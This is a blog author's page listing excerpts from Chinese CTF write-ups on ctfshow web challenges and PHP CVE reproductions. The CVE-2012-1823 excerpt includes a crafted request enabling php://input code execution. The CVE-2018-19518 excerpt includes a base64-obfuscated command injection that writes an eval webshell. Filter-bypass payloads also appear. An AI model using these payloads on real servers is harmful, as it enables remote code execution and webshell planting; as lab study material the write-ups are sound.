自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(12)
  • 收藏
  • 关注

原创 ctfshow 常用姿势

ctfshow 常用姿态

2022-11-02 18:16:34 912

原创 ctfshow 新手杯web

ctfshow 新手杯web部分

2022-10-08 17:35:38 371 1

原创 CVE-2012-1823

CVE-2012-1823详细介绍漏洞复现(靶场为ctfshow)利用http://url/index.php?-s判断是否存在漏洞若出现源码组存在bp抓包按下面修改POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1Host: example.comAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (co

2022-01-05 21:37:56 2136

原创 ctfshow CVE-2018-19518复现

本次测试靶场在ctfshowCVE-2018-19518实战操作:bp抓包后进行修改%09后面与|前面为要执行命令的base64hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sL2UucGhw|base64%09-d|sh}a&username=222&password=333我的是将一句话写入e.php中蚁剑连接得到shell

2022-01-04 21:42:54 766

原创 CVE-2019-11043 PHP-FPM 复现和学习

CVE-2019-11043复现和学习漏洞描述CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。该漏洞需要在nginx.conf中进行特定配置才能触发。location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcg

2022-01-04 18:05:00 193

原创 ctfshow web入门 php特性

web89通过数组绕过playload:?num[]=1web90用小数进行绕过playload?num=4476.1web91show_source(__FILE__);include('flag.php');$a=$_GET['cmd'];if(preg_match('/^php$/im', $a)){ if(preg_match('/^php$/i', $a)){ echo 'hacker'; } else{ echo

2021-12-31 23:43:52 763

原创 数组溢出的一道题

题目if($array[++$c]=1){ if($array[]=1){ echo "nonono"; } else{ require_once 'flag.php'; echo $flag; }}解析$array[]=1这个语句正常赋值时,他一定为1,若想跳过语句则必须使他的赋值出问题。即 使数组溢出作为PHP最重要的数据类型HashTable其key值是有一定的范围的,如果设置的key值过大就会出现溢出的问题,临界点是9223372036854775807这个数

2021-11-06 16:23:33 122

原创 ctfshow web入门反序列化

魔术变量:__sleep() //在对象被序列化之前运行__wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)__construct() //在类实例化时,会触发进行初始化__destruct() //对象被销毁时触发__toString(): //当一个对象被当作字符串使用时触发__call() //在对象上下文中调用不可访问的方法时触发__callStatic() //在静态上下文中调用不可访问的方法时触发__get() //获得一个类的成员变量时调

2021-11-06 16:19:42 1017

原创 ctfshow web入门 文件包含

把字符串 "Hello world!" 中的字符 "world" 替换为 "Shanghai": <?php echo str_replace("world","Shanghai","Hello world!");?>data:// 协议 条件:allow_url_fopen:on allow_url_include :on 用法:data://text/plain 即: http://127.0.0.1/include.ph...

2021-11-05 21:45:52 193

原创 一道反序列化session题

index.php: <?phpini_set('session.serialize_handler', 'php');require("./class.php");session_start();$obj = new foo1();$obj->varr = "phpinfo.php";?>这是foo1的析构函数class.php <?phphighlight_string(file_get_contents(basename($_SERVER[

2021-10-30 21:12:12 114

原创 ctfshow web入门55~122 命令执行

<?php/*# -*- coding: utf-8 -*-# @Author: Lazzaro# @Date: 2020-09-05 20:49:30# @Last Modified by: h1xa# @Last Modified time: 2020-09-07 20:03:51# @email: h1xa@ctfer.com# @link: https://ctfer.com*/// 你们在炫技吗?if(isset($_GET['c'])){ $c=

2021-10-14 10:27:07 2369

原创 ctfshow web5

ctfshow web5 由题可知v1为全字母v2为全数字当v1和v2的MD5相同时,打印出flag的值。正常情况下不同数段的MD5是不是相同的但当0e加数字则输出的值为0;则纯数字类:240610708 0e462097431906509019562988736854314282422 0e990995504821699494520356953734571579406 0e972379832854295224118025748221903251147 0e1745...

2021-05-24 22:16:50 160

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除